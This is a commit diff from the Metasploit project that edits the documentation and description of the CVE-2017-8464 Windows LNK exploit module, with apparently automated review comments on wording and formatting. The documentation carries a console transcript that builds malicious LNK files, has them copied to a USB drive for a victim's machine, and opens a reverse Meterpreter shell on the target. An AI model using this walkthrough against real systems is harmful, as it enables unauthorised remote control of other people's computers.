update some documentation

bug/bundler_fix
Brent Cook 2017-08-03 17:09:44 -05:00
parent 81500f7336
commit da3ca9eb90
2 changed files with 16 additions and 14 deletions

View File

@ -1,10 +1,13 @@
## Vulnerable Application
Any Windows versions without the patch for CVE-2017-8464. The exploit doesn't appear to work with UNC drives. Because of this the DLL file needs to be on the local file system or an USB drive. A fix was released on June 2017 Patch Tuesday.
This vulnerability affects any Windows version without the patch for
CVE-2017-8464. The exploit does not appear to work with UNC drives. Because of
this, the exploit DLL file needs to be on a local file system or an USB drive.
A fix was released in the June 2017 Patch Tuesday.
## Vulnerable Setup
To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464. To test the bypass, make sure that MS10-046 & MS15-020 are installed.
To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464. To test the bypass, ensure that MS10-046 & MS15-020 are installed.
## Verification Steps
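Review bot: the rewrapped sentence still reads "on a local file system or an USB drive"; "USB" begins with a consonant sound, so it should be "a USB drive" (the pre-change line had the same error, and this rewording is the natural place to fix it). The reflow to roughly 80 columns and the "in the June 2017 Patch Tuesday" wording are otherwise fine.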
@ -26,25 +29,25 @@ To set up the vulnerable environment, install a Windows version without the patc
1. `cp /root/.msf4/local/* [USB drive path]`
2. Insert device in target machine and browse to it
## Options
**FILENAME**
The file name of the LNK file. This file name can be renamed in a letter stage. If not set, a random name will be generated.
The file name of the LNK file. This file name can be renamed later. If the value is not set, a random name will be generated.
**DLLNAME**
The file name of the DLL file. This file name cannot be renamed as this will invalidate the LNK file(s). If not set, a random name will be generated.
The file name of the DLL file. This file cannot be renamed, as this will invalidate the LNK file(s). If not set, a random name will be generated.
**DRIVE**
Drive letter assigned to USB drive on victim's machine. If not set LNK files for drive D till Z will be created. Copy all these LNK files to the USB drive to make it more likely that the vulnerability is triggered.
Drive letter assigned to USB drive on victim's machine. If not set, LNK files for drive D till Z will be created. Copy all these LNK files to the USB drive to increase the chance that the vulnerability will be triggered.
### Windows 10 x64 (Build 14393)
```
msf > use exploit/multi/handler
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.146.197
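Review bot: in the DRIVE option text, "LNK files for drive D till Z" survives the rewording; "drive letters D through Z" is the idiomatic form and makes clear that both endpoints are included. The FILENAME change to "can be renamed later" reads much better than "in a letter stage". The doubled `msf > use exploit/multi/handler` line at the end of the hunk shows no visible difference, so it is presumably trailing-whitespace cleanup; that is fine, but it deserves a mention in the commit message since the same pattern recurs in the later hunks.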
@ -52,10 +55,10 @@ LHOST => 192.168.146.197
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.146.197:4444
[*] Started reverse TCP handler on 192.168.146.197:4444
[*] Starting the payload handler...
msf exploit(handler) > back
msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.146.197
@ -88,7 +91,7 @@ msf exploit(cve_2017_8464_lnk_rce) > exploit
[*] /root/.msf4/local/eZiWpyEYbkWHqStW_X.lnk created, copy to the target USB drive
[*] /root/.msf4/local/PawzVPKmvBoSblhA_Y.lnk created, copy to the target USB drive
[*] /root/.msf4/local/vJhDzJUydwYxnLlp_Z.lnk created, copy to the target USB drive
msf exploit(cve_2017_8464_lnk_rce) >
msf exploit(cve_2017_8464_lnk_rce) >
[*] Sending stage (1189423 bytes) to 192.168.146.193
[*] Meterpreter session 1 opened (192.168.146.197:4444 -> 192.168.146.193:50020) at 2017-07-25 19:28:27 +0200
sessions -i 1
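Review bot: the transcript line `sessions -i 1` at the end of this hunk has no `msf exploit(cve_2017_8464_lnk_rce) >` prompt in front of it, unlike every other command in the console capture; since the neighbouring prompt lines are already being touched for whitespace, adding the prompt here would make the capture read consistently.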
@ -102,5 +105,5 @@ System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
meterpreter >
```

View File

@ -17,8 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
info,
'Name' => 'LNK Code Execution Vulnerability',
'Description' => %q{
This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)
that contain a dynamic icon, loaded from a malicious DLL.
This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain a dynamic icon, loaded from a malicious DLL.
This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is
similar except an additional SpecialFolderDataBlock is included. The folder ID set
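Review bot: joining the first two description lines yields a single line of roughly 130 columns while the sentences that follow ("This vulnerability is a variant of MS15-020 ...") stay wrapped at about 90, so the `%q{ }` block ends up inconsistently wrapped; either keep the original two-line wrap or reflow the whole paragraph to one width. The line break inside the `%q` string is cosmetic in the source, so this is purely a readability point for module authors.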
@ -57,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
[ 'Windows x64', { 'Arch' => ARCH_X64 } ],
[ 'Windows x86', { 'Arch' => ARCH_X86 } ]
],
'DefaultTarget' => 0, # Default target is 64-bit
'DefaultTarget' => 0, # Default target is Automatic
'DisclosureDate' => 'Jun 13 2017'
)
)
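Review bot: the comment now states that target 0 is Automatic, but the only target entries visible in this hunk's context are 'Windows x64' and 'Windows x86'; the Targets array begins above line 56, so please confirm that an 'Automatic' entry really sits at index 0 there, otherwise the previous comment ("64-bit") was the accurate one. The 'Jun 13 2017' DisclosureDate is consistent with the June 2017 Patch Tuesday mentioned in the documentation hunk.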